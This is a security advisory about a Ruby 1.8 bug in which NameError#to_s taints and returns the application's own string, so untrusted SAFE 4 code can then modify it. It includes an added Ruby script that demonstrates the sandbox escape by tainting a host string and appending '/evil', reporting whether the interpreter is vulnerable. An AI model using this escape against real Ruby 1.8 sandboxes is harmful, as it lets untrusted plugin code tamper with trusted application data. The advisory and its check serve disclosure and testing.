Vigil@nce: Ruby 1.8, modify a variable via NameError despite SAFE 4
October 2012 by Vigil@nce
This bulletin was written by Vigil@nce : http://vigilance.fr/offer
SYNTHESIS OF THE VULNERABILITY
When a Ruby 1.8 application runs external (untrusted) code in SAFE 4
mode, that code can use NameError in order to modify a variable of
the application.
– Impacted products: Unix (platform)
– Severity: 2/4
– Creation date: 08/10/2012
DESCRIPTION OF THE VULNERABILITY
The security level "$SAFE = 4" limits the features that Ruby code is
allowed to use. For example, in SAFE 4 mode, Ruby code is not allowed
to modify an untainted (internal, trusted) string; only tainted
objects may be modified. SAFE 4 mode is usually used to execute code
coming from an untrusted source, such as a plugin.
A NameError can be converted to a string, and in Ruby 1.8 the method
doing so returns the message object itself rather than a copy. For
example, with an untainted application variable:
NameError.new($variable).to_s
However, this method automatically taints the returned string, that
is, the application's own variable, with OBJ_INFECT(). As the
variable is now tainted, SAFE 4 mode no longer forbids the untrusted
code from modifying it.
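The following script is an added example and is not code from the Vigil@nce bulletin nor from Ruby's own sources. It shows the two halves of the mechanism: that Exception#to_s and NameError#to_s hand back the caller's own String object rather than a copy (still true on current Ruby), and, on an interpreter that still has $SAFE = 4 (Ruby 1.8 through 2.0), whether an untrusted SAFE 4 thread can use NameError#to_s to taint and then modify a string the host never tainted. The names app_config, to_s_aliases_message? and safe4_name_error_escape are this example's own, and the sample strings are constructed; on Ruby 2.1 and later, where SAFE 4 no longer exists, the live check reports :unsupported and only the aliasing probe runs.

```ruby
# Added example, not code from the Vigil@nce bulletin or from Ruby itself.
# (a) Exception#to_s / NameError#to_s return the message object itself.
# (b) On an unpatched Ruby 1.8, tainting that object through NameError#to_s
#     lets SAFE 4 code modify a string it was refused a moment earlier.

# $SAFE = 4 was removed in Ruby 2.1 (later interpreters reject or ignore it),
# so the live check below only runs on 1.8 / 1.9 / 2.0.
def ruby_has_safe_level_4?
  (RUBY_VERSION.split(".").map { |s| s.to_i } <=> [2, 1]) < 0
end

# The aliasing the bug relied on: to_s hands back the very String passed to
# the constructor, not a copy. This is still the case on current Ruby; it was
# only dangerous while to_s also tainted that object.
def to_s_aliases_message?(klass)
  msg = "host-owned string".dup          # constructed stand-in for an application variable
  klass.new(msg).to_s.equal?(msg)
end

# Run an untrusted snippet in a SAFE 4 thread, the way a 1.8 plugin host would.
# Returns :mutated     if the snippet changed the host's untainted string (vulnerable),
#         :blocked     if the second write was still refused (fixed 1.8),
#         :unsupported if this interpreter has no SAFE 4.
def safe4_name_error_escape
  return :unsupported unless ruby_has_safe_level_4?

  app_config = "/etc/app/trusted.conf"   # constructed; untainted, owned by the host
  outcome = nil
  Thread.new do
    $SAFE = 4                            # per-thread level; cannot be lowered again
    begin
      app_config << "/evil"              # untainted -> SecurityError "Insecure: can't modify string"
    rescue SecurityError
    end
    # The bug: on an unpatched 1.8, to_s taints the message object, which is
    # the host's own string rather than a copy (OBJ_TAINT / OBJ_INFECT in error.c).
    NameError.new(app_config).to_s
    begin
      app_config << "/evil"              # now tainted, so SAFE 4 no longer objects
      outcome = :mutated
    rescue SecurityError
      outcome = :blocked
    end
  end.join
  outcome
end

if __FILE__ == $0
  puts "NameError#to_s returns the caller's object: #{to_s_aliases_message?(NameError)}"
  puts "SAFE 4 escape via NameError#to_s: #{safe4_name_error_escape}"
end
```

Run under an unpatched Ruby 1.8 the check reports :mutated; under a 1.8 build that includes the fix, where to_s no longer taints the message, the second write is still refused and it reports :blocked. The aliasing probe returning true on a modern interpreter is harmless, because the taint model that turned it into a sandbox escape is gone.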
This vulnerability only impacts Ruby 1.8. It is similar to
VIGILANCE-VUL-11993 (https://vigilance.fr/tree/1/11993), but its
origin is a variant of CVE-2011-1005 (VIGILANCE-VUL-10383
(https://vigilance.fr/tree/1/10383)).
When a Ruby 1.8 application runs external (untrusted) code in SAFE 4
mode, that code can therefore use NameError in order to modify a
variable of the application. Depending on the variable modified, the
application can then be forced to perform unwanted tasks.
ACCESS TO THE COMPLETE VIGIL@NCE BULLETIN
http://vigilance.fr/vulnerability/Ruby-1-8-modify-a-variable-via-NameError-despite-SAFE-4-12003